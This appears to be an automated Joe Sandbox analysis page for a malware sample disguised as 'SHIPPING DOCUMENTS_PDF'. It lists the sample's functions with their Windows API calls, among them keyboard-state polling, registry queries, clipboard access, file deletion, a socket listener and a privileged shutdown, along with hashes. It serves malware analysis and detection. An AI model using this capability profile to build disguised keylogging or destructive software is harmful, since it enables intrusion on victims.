                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                                                                    • Instruction ID: da5246be21fb1aba21ec7440df51b5ee381ee08e5a8c80437e71a80610424ce0
                                                                                    • Opcode Fuzzy Hash: e5bc2501b20ecbdabca23ff34c68bf1a4f714b067505b7078364ac32b33a5451
                                                                                    • Instruction Fuzzy Hash: 46611E7190820AAFDF109FA5DC95ABEBBB9FF05300F0481AAE915A7251DB319A05CB60
                                                                                    Function 00B666E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                    • API String ID: 0-4052911093
                                                                                    • Opcode ID: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                                                                    • Instruction ID: 84a8ee8aa1c8e43305f77563b0fe57bb20a7b475170dc2fca9f2c872b165a24e
                                                                                    • Opcode Fuzzy Hash: 6b08768993bf93741164d4a00ee670c2b7c02c53be94055fb3cc9d9378044832
                                                                                    • Instruction Fuzzy Hash: 58726D71E04219DBDF64CF59C8807AEB7F5FF49310F1485AAE849EB291EB349981CB90
                                                                                    Function 00BB001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00BB0097
                                                                                    • SetKeyboardState.USER32(?), ref: 00BB0102
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00BB0122
                                                                                    • GetKeyState.USER32(000000A0), ref: 00BB0139
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00BB0168
                                                                                    • GetKeyState.USER32(000000A1), ref: 00BB0179
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00BB01A5
                                                                                    • GetKeyState.USER32(00000011), ref: 00BB01B3
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00BB01DC
                                                                                    • GetKeyState.USER32(00000012), ref: 00BB01EA
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00BB0213
                                                                                    • GetKeyState.USER32(0000005B), ref: 00BB0221
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                                                                    • Instruction ID: 9ac8b69e79fa9050fca53a48fb46d632d329b64a082fa2d3a9063ef13bd1ae64
                                                                                    • Opcode Fuzzy Hash: d7ed342c22d929227f56d9a5549e6bdea7fad7563b90d89e4cce48d2a852922d
                                                                                    • Instruction Fuzzy Hash: 4651B4209157882BFB35FBA488547FBBFF4DF11380F4845DA99C2561C2EAE49A8CC761
                                                                                    Function 00BD03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD04AC
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BD054B
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BD05E3
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BD0822
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD082F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 84454fea0a35c78c6543d1a9e751e85cc0173bd3a1786cdab046c79a40cccfe8
                                                                                    • Instruction ID: 13fd8f1d7e294898f81d35aee0c39ad15f295d17b151571c49da70359717f208
                                                                                    • Opcode Fuzzy Hash: 84454fea0a35c78c6543d1a9e751e85cc0173bd3a1786cdab046c79a40cccfe8
                                                                                    • Instruction Fuzzy Hash: F4E14F71604205AFCB14EF24C895E6ABBE4FF89714F0485ADF84ADB361DA31ED05CB52
                                                                                    Function 00BC83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • CoInitialize.OLE32 ref: 00BC8403
                                                                                    • CoUninitialize.OLE32 ref: 00BC840E
                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00BE2BEC,?), ref: 00BC846E
                                                                                    • IIDFromString.OLE32(?,?), ref: 00BC84E1
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC857B
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC85DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                    • API String ID: 834269672-1287834457
                                                                                    • Opcode ID: 8622fee552ee16d9cb9957ee2b84df3d09f39853ef841a62ad2748a69bbf36fb
                                                                                    • Instruction ID: 0a915e8be267b752a2eacfb08a3b77c3d863ad8e05e4b83acbf5ab526cb30b90
                                                                                    • Opcode Fuzzy Hash: 8622fee552ee16d9cb9957ee2b84df3d09f39853ef841a62ad2748a69bbf36fb
                                                                                    • Instruction Fuzzy Hash: 53618970608312AFC714DF64C889F6AB7E8AF49754F04489DF9869B291DB70ED48CB92
                                                                                    Function 00BC4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                                                                    • Instruction ID: dad28a48c56a6702af1b9da038ba772170d9931429192221b6f6606a6cf39fc1
                                                                                    • Opcode Fuzzy Hash: 4bcacbc6ed719bf86f51660984f9b9fb871160939af4243db2300cbdca7287ac
                                                                                    • Instruction Fuzzy Hash: 89218D352052119FDB10AF24DC69F6EBBE8EF55751F1480AAF9469B2A1EB30ED00CB54
                                                                                    Function 00BB37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BB38A3
                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00BB394B
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00BB395E
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00BB397B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB399D
                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00BB39B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 4002782344-1173974218
                                                                                    • Opcode ID: 97bfaeb8ab904f9c37555ef8558390770b12d1f4a872a6be38295ae904940282
                                                                                    • Instruction ID: 03b29317e2158dfe91649dd163af7becab5e3952c603261418037b120a5a9c02
                                                                                    • Opcode Fuzzy Hash: 97bfaeb8ab904f9c37555ef8558390770b12d1f4a872a6be38295ae904940282
                                                                                    • Instruction Fuzzy Hash: 43516D3190514DABCB11EBA0D992AFDB7F9AF15301F6000E9E846771A1EFA16F0DCB61
                                                                                    Function 00BBF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00BBF440
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00BBF470
                                                                                    • _wcscmp.LIBCMT ref: 00BBF484
                                                                                    • _wcscmp.LIBCMT ref: 00BBF49F
                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 00BBF53D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF553
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                    • String ID: *.*
                                                                                    • API String ID: 713712311-438819550
                                                                                    • Opcode ID: 3b4ea5445da8e5098b201b68c88803b6319037ddbd6a9e073aa223da9d71d5c0
                                                                                    • Instruction ID: 39e7682a34cf8e2dd4a0fbd717266b625db8158353a298b8e5de050756c024ff
                                                                                    • Opcode Fuzzy Hash: 3b4ea5445da8e5098b201b68c88803b6319037ddbd6a9e073aa223da9d71d5c0
                                                                                    • Instruction Fuzzy Hash: 45417C7190421AAFCF24EF64DC55AFEBBF4FF15310F1444A6E815A32A0EB709A58CB50
                                                                                    Function 00B65760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 9fb15db7f7a9db1d1eb3bf4bc1e381cd5d5e5b9b8d96375e62a1850fab7ba580
                                                                                    • Instruction ID: 7e8cfcc25bf7b14118c29c2f057160f94d2a41a0679701a500d877631038095e
                                                                                    • Opcode Fuzzy Hash: 9fb15db7f7a9db1d1eb3bf4bc1e381cd5d5e5b9b8d96375e62a1850fab7ba580
                                                                                    • Instruction Fuzzy Hash: 75128A70A04609DFDF14DFA5D981AAEB7F5FF48300F1085A9E806A7291EB39AD24CB50
                                                                                    Function 00BB3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                      • Part of subcall function 00BB4A31: GetFileAttributesW.KERNEL32(?,00BB370B), ref: 00BB4A32
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BB3B89
                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00BB3BD9
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BB3BEA
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB3C01
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB3C0A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2649000838-1173974218
                                                                                    • Opcode ID: d5165cd81faf422f3720027c3ac8eaf22050d7ac550679f03c1f4bb9b5d4637f
                                                                                    • Instruction ID: 1fa729681ff33cb531da707f29e828240684d264959c0e2476244a0a3ffa2f4c
                                                                                    • Opcode Fuzzy Hash: d5165cd81faf422f3720027c3ac8eaf22050d7ac550679f03c1f4bb9b5d4637f
                                                                                    • Instruction Fuzzy Hash: A2317E310493859FC201EB64D8A19FFBBE8AE91315F404EADF8D5931A1EF219A0DC763
                                                                                    Function 00BB51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                                                      • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                                                      • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00BB51F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                    • String ID: $@$SeShutdownPrivilege
                                                                                    • API String ID: 2234035333-194228
                                                                                    • Opcode ID: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                                                                    • Instruction ID: 5e8e2cb78a9abf6a0d26c51efe020c5d271d9bd2741385e7479ee4e63180f73d
                                                                                    • Opcode Fuzzy Hash: b85426e5413f449b404dc6253a61313d041e753a0b38118135ef8b57358cbc16
                                                                                    • Instruction Fuzzy Hash: E401F731697A166FE7386668AC9BFFAB3D8DB05740F2404A1F943E20D2EAD11C0085A2
                                                                                    Function 00BC6283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00BC62DC
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC62EB
                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00BC6307
                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00BC6316
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6330
                                                                                    • closesocket.WSOCK32(00000000), ref: 00BC6344
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                    • String ID:
                                                                                    • API String ID: 1279440585-0
                                                                                    • Opcode ID: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                                                                    • Instruction ID: cd9eb14f05561dbbac1bdf68547023fbed6bc53886879386fbc3858c1662b4b3
                                                                                    • Opcode Fuzzy Hash: c2c4517c93e9f8fcbe9d1e9ac2a3e89f8b1bdf0432e8e9e2155baecaebc9c935
                                                                                    • Instruction Fuzzy Hash: 78219E756002059FCB10EF68C885F7EB7E9EF89721F1481A9E816A72D1DB70AD05CB51
                                                                                    Function 00B65520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                    • _memmove.LIBCMT ref: 00BA0258
                                                                                    • _memmove.LIBCMT ref: 00BA036D
                                                                                    • _memmove.LIBCMT ref: 00BA0414
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 1300846289-0
                                                                                    • Opcode ID: 35195a8139b77f7473afc520cb2438bb517044456ef35081f45c26b31425dcdb
                                                                                    • Instruction ID: 8cf37b27674f3578ca0768e48c20b5b96a662a3f9aa7198e547ab7b9d896aee8
                                                                                    • Opcode Fuzzy Hash: 35195a8139b77f7473afc520cb2438bb517044456ef35081f45c26b31425dcdb
                                                                                    • Instruction Fuzzy Hash: AE02C0B0A14209DBCF14EF64D981AAE7BF5EF49300F5480E9E80AEB251EB35DD54CB91
                                                                                    Function 00B51287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B519FA
                                                                                    • GetSysColor.USER32(0000000F), ref: 00B51A4E
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00B51A61
                                                                                      • Part of subcall function 00B51290: DefDlgProcW.USER32(?,00000020,?), ref: 00B512D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorProc$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3744519093-0
                                                                                    • Opcode ID: c994de4106ca1b47beb2229418d494dac0c7681a162c2cbea619e75eead501ad
                                                                                    • Instruction ID: a8dbffa92dc4e20053c4bf2f93b435cb6efddee5e006149c2e21d51a0fa49199
                                                                                    • Opcode Fuzzy Hash: c994de4106ca1b47beb2229418d494dac0c7681a162c2cbea619e75eead501ad
                                                                                    • Instruction Fuzzy Hash: B2A15A75106585BAEA2AAB3C8C94FBF25DCDB42343B1409DAFD12D21E2DA249D09D3B1
                                                                                    Function 00BBBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BBBCE6
                                                                                    • _wcscmp.LIBCMT ref: 00BBBD16
                                                                                    • _wcscmp.LIBCMT ref: 00BBBD2B
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBBD3C
                                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00BBBD6C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
